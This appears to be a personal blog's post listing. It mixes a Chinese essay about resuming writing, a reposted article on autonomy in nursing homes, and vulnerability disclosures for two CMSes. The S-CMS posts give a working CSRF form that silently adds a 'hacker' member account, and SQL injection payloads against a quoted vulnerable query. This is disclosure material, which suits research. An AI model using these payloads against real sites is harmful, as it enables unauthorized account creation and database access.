Skip to main content

Posts

UKCMS 1.1.10 后台CSRF漏洞

https://github.com/yxcmf/ukcms/issues/4
Recent posts

再出发

  几年前,大抵是我还在上初中的时候,就保持着每周写一篇文章的习惯.那 时,即使文章所蕴含的思想并不足够深刻,但至少都是经过思考的产物.过去写的文章,全都发在当时常用的qq空间里,现在已经全无踪迹,因为过去的某一个下午,发觉自己发表文章面向的对象宽泛且愚蠢,便于那天将文章全部删除,并发出一条新的"停更十年".后来这条通知性质的说说也未能幸免于难.回头看,不免觉得惋惜,我失去了窥视过去思考成果的机会.     后来,为什么又再度开始了呢?实际上,多出于世俗的功利考虑,也包含精神宣泄的冲动.在日常生活中,人的行为多为思考结果的体现.而思考的过程并未能显现出来.倘若过着的是纵情于感官享受的生活,倒也无妨,因为并不存在表达精神境界的动机,也因掌握着生活的主动权而免于受支配的烦恼.而我并非此类人.若不将心中所想以某种形式表达出来,世俗社会对于我的定义大致是高中辍学,不学无术,好逸恶劳的asshole.这是需求之一,另一部分是求偶需求,属于比较长远的考虑,今后在另一篇中写出来.     除此之外,锻炼表达能力也占一部分.写文章这件事总归是需要长久练习的不恰当的表达方式可以使语言与原意大相径庭,在写作时这种感觉尤为明显.

不服管的人永远是年轻

同人于野 (首发于《罗辑思维》,2016年5月31日) 世界上有管人的人和被管的人,前者比后者幸福得多。似乎大多数人只能被管,但管与被管其实不是地位,而是思维模式。不论你比生活还是比工作,我敢说那些就算管不了别人也至少能做到不服管的人,都是赢家。 他们就如同王小波说的特立独行的猪一般健康而且能干 — 不过我这篇文章要说的道理,来自严肃的科学研究。 1. 恐怖养老院 1970年代,有人拿养老院里的老人做了个实验[1]。研究者让大学生来探望老人,这对寂寞的老人们是个福利,而且每人都会获得多次探望。老人们被分成两组。“强控制组”的老人可以决定探访者每次什么时候来和待多长时间:“你下周四再来吧,陪我聊一个小时”。“弱控制组”的老人没有决定权,是大学生告诉老人:“我下周四再来,到时候陪您一小时”。两个组的实际探访时间其实大体相同。 结果强控制组的老人明显变得快乐多了,精神和身体状态都更好,用药都减少了,所以控制权有利于身心健康 — 看来古人说孝要“顺”还真有点儿道理。过了两个月,研究者觉得结论已经非常明显了,也就终止了实验。 但是几个月以后,研究者再回访养老院,发现一个万万没想到的结果:强控制组有好几位老人去世了!其死亡率比弱控制组高很多,已经不能用统计误差解释。 一个人曾经有控制权,然后你突然剥夺他的控制权,还不如从来没有过这个控制权。 这大概是我所听过最惊心动魄的实验之一。养老院能有多恐怖,这么一点点的控制权居然能有这么大的作用?后来我又听说了下面要讲到的一个研究,现在我认为养老院就是这么恐怖。 这跟一切物质条件,包括服务员是否和蔼可亲之类都没关系。关键在于,一旦进了养老院,你就成了被管的对象。所以对很多老人来说,进养老院之日,就是加速死亡之时。 除了“某一类”老人之外。 2. 革命人永远是年轻 1990年代,又有人拿养老院的老人做过一项研究[2]。研究者这次没做实验,他们只是观察对比了在养老院里也能活的很好的老人和活的不好的老人,看他们的生活习惯有什么不同。结果发现,那些在养老院里混得最好的老人有个共同的特点:他们都有一种反抗精神。 比如说,他们在吃饭前非得搞个私下的食物交换活动。有个老人是这么解释的:今天发给我的是蛋糕,我本来也更愿意吃蛋糕,但是我宁可跟别人换一个别的东西吃 — 换来的东西至少是我自己选择的,给我什么就吃什么,这个我不...

The POC of S-CMS(CSRF)-CVE-2018-19332

Download page: https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip CSRF Exp: <!DOCTYPE html> <html> <head>     <meta http-equiv="Content-Type" content="text/html" charset="utf-8" /> </head> <body> <center><h1>fake request</center> <div>     <form action="http://127.0.0.1/S-CMS/admin/ajax.php?type=member&action=add&lang=0" name="form" method="post" role="form">     <input type="hidden" name="M_login" value="hacker">     <input type="hidden" name="M_pwd" value="hacker">     <input type="hidden" name="M_money" value="10000">     <input type="hidden" name="M_fen" value="0">     <input type="hidden" name="M_name" value="1">     <inpu...

The POC of S-CMS(sql-injection)-CVE-2018-19331

Download page: https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip location: S-CMS/search.php line 155 Vulnerable code:  $sql="select * from SL_text where (T_title like '%". $keyword ."%' or T_content like '%". $keyword ."%' ) order by T_id desc"; Exp: %' AND 1=1 AND '%'=' %' AND 1=2 AND '%'=' Attacker can add sql statement in the between of both "and" to query the database.